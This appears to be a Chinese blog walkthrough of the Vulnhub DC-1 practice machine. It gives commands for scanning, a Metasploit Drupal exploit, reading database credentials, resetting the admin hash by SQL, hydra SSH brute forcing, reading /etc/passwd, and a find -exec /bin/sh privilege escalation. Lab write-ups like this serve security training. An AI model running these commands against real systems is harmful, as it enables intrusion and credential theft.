说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-1为基础入门篇,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。
下载地址:
https://www.vulnhub.com/entry/dc-1-1,292/
目标机IP地址:192.168.5.137
攻击机kali IP地址:192.168.5.135
arp-scan 是一个用来进行系统发现的ARP命令扫描工具。
命令 arp-scan -l
发现目标ip为:192.168.5.137
使用nmap 进行端口查看
nmap -sS -Pn 192.168.5.137 --min-rate 1000 -p1-65535 --open
*flag1
访问80端口发现是Drupal所搭建的站点。
msf查找该cms有哪些可利用的漏洞(一个一个实验)
如图:
msfconsole
攻击成功执行命令,发现flag1.txt。
*flag2
python-> 转换交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
drupal数据库配置文件 /sites/default/settings.php
找到flag2 并得知是mysql的数据库以及用户名密码。dbuser/R0ck3t
*flag3
链接 mysql通过flag2获取的数据库配置信息
进入数据库查看数据
查看表发现users表,查看该表字段返现用户名密码。
无法解密,那我们就将密码改掉,收集资料得知,Drupal对用户密码的加密是通过特定的加密文件进行加密的,加密文件位置在网站根目录下的scripts下。
使用加密脚本加密新密码123456,生成加密密文。
详细信息:
https://www.drupal.org/node/1023428/
通过官方描述,对密码进行修改
password: 123456
hash: $S$D7lXBdKAW230VzfapF/GsJg98zV8z7T3GNlR45nZtR1uCcYh11fn
对admin用户进行密码修改
update users set pass ='$S$D7lXBdKAW230VzfapF/GsJg98zV8z7T3GNlR45nZtR1uCcYh11fn' where name = 'admin';
已更改成功
登陆后台成功,发现flag3。
*flag4
由flag3 提示信息 我们要查看一下/etc/passwd 以及 /etc/shadow
由于权限的问题无法查看shadow,查看passwd文件,发现flag4用户,怀疑可以连接ssh,对其进行ssh爆破。
使用john+hydra
john系统自带密码路径
自带字典 :/usr/share/john/password.lst
爆破命令:
hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.5.137
flag4/orange
ssh 链接
进行提权获取root权限
find ./ gem -exec '/bin/sh' ;
参考链接:https://www.freesion.com/article/7353791580/
https://www.cnblogs.com/lxfweb/p/13364770.html
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
本文始发于微信公众号(thelostworld):DC-1靶机解题思路
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论